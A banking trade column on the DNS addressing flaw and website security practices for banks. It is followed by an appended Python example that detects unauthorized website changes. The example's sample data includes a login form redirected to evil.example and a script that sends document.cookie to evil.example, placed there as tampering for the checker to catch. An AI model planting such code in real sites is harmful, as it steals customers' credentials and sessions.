By John Jaser
Is the Internet safe? Bankers have had reasons a-plenty to ask that question over the years. Phishing, hijacking, and botnet armies have undermined the perceived security of this growing business channel.
No doubt, bankers were asking the question yet again when they read the July 9 headline “Critical flaw rocks the Internet.” The article revealed that major hardware and software developers had been secretly working for months to fix a fundamental Internet error that would have turned control of Web traffic over to the hackers.
The flaw concerned the way browsers, servers and routers translate www.xyz.com into the real address, which looks more like 111.212.056.144. When translated correctly, the web surfer goes to xyz.com. When hacked, the web surfer will go wherever the criminals want him to go, regardless of the Web site address typed into the browser.
Imagine what the “phishers” and other criminals could do with that. Bank customers would type in www.mybank.com and find themselves at www.mycriminal.com without ever knowing the difference. Say goodbye to passwords, birth dates, and mothers’ maiden names. The hackers could get them all.
The good news is that hardware and software developers came together, created a fix and coordinated a release for all computer software platforms. The patch’s design prevents hackers from “reverse engineering” the patch, and technical details about the flaw were kept secret for a month after the patch’s release to allow companies time to update their computers.
The bad news is that the flaw was found by accident. For those of us who keep asking if the Internet is safe, the answer continues to be, “We just don’t know.” That’s not good enough for the increasing numbers of customers who are switching their banking business to the web.
For banks and other financial institutions to keep the Internet safe for their customers, each needs to:
Subscribe to a daily vulnerability assessment service such as Hackersafe to scan the institution’s website and mitigate any vulnerabilities reported. Prompt attention to coding errors and other flaws can prevent the bank’s Web site from “relaying” hacker code to unsuspecting customers.
Monitor the institution’s Web site for any unauthorized changes. Your security teams should review all configuration changes requested by your institution’s staff and match those changes with the ones listed in your institution’s website change report. These fundamental tools will ensure that your staff isn’t fiddling where they shouldn’t be and that your Web site hasn’t been altered by someone you don’t know.
Review your Web site hosting service’s most current Internet security report. If your service doesn’t provide a report, insist on it. If you don’t get one, your regulators may insist on it at your next exam.
Review reports of blocked traffic and email usage on a regular basis. We recommend at least weekly, if not daily, to detect potential issues arising from criminal minds.
Contract for a vulnerability scan of your institution’s internal network on a regular basis. If you keep looking, eventually you will find!
Listen to your customers’ reports of unusual e-mails and website pages. They are your early warning system on the World Wide Web.
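The Web site change monitoring described above, as an added example that is not part of the original column and not COCC’s own tooling: it hashes a baseline and a current snapshot of site files (both constructed here), diffs them, and reconciles every difference against an approved change report that records the ticket and the expected content hash, so that both unrequested changes and approved files whose content does not match the approved version are flagged. Paths, tickets and file contents are invented for the demonstration.

```python
"""Reconcile observed web content changes against an approved change report."""
import hashlib


def sha256(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


# Constructed sample snapshots of the site, keyed by path. In practice these
# would be read from the web server's document root or fetched over HTTP.
BASELINE = {
    "/index.html": b"<html><body>Welcome to MyBank</body></html>",
    "/login.html": b"<form action='/auth' method='post'>...</form>",
    "/js/app.js": b"function login(){ /* submit form */ }",
}
CURRENT = {
    "/index.html": b"<html><body>Welcome to MyBank - new hours</body></html>",
    "/login.html": b"<form action='http://evil.example/auth' method='post'>...</form>",
    "/js/app.js": b"function login(){ /* submit form */ }",
    "/js/track.js": b"new Image().src='http://evil.example/?c='+document.cookie",
}
# Constructed change report: path -> (ticket, sha256 of the approved content).
# A value of None for the hash would mean an approved removal.
APPROVED = {
    "/index.html": ("CR-1042 update branch hours", sha256(CURRENT["/index.html"])),
}


def diff_snapshots(baseline, current):
    """Return {path: 'added'|'removed'|'modified'} for every difference."""
    changes = {}
    for path in sorted(set(baseline) | set(current)):
        if path not in current:
            changes[path] = "removed"
        elif path not in baseline:
            changes[path] = "added"
        elif sha256(baseline[path]) != sha256(current[path]):
            changes[path] = "modified"
    return changes


def reconcile(changes, current, approved):
    """Split detected changes into (approved, unauthorized) dictionaries."""
    ok, bad = {}, {}
    for path, kind in changes.items():
        if path not in approved:
            bad[path] = kind  # nobody requested this change
            continue
        ticket, expected = approved[path]
        actual = None if kind == "removed" else sha256(current[path])
        if actual == expected:
            ok[path] = ticket
        else:  # requested, but the live content is not what was approved
            bad[path] = f"{kind} (content differs from approved change {ticket})"
    return ok, bad
```

Run `reconcile(diff_snapshots(BASELINE, CURRENT), CURRENT, APPROVED)` and alert on every path in the second dictionary; a scheduled run against fresh snapshots gives the change report reconciliation the column recommends.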
These measures won’t prevent massive errors such as the addressing issue reported above, but you will know sooner than your competitors that a problem exists, and be able to protect your customers. That’s what it takes to keep today’s Internet safe for the banking business.
John Jaser is an Internet security manager at Avon, Conn.-based COCC Inc. (www.cocc.com), a 41-year-old firm specializing in outsourced information technology and support. “Guarding the Gate” is a regular feature in Banking New York focusing on banking technology and security trends.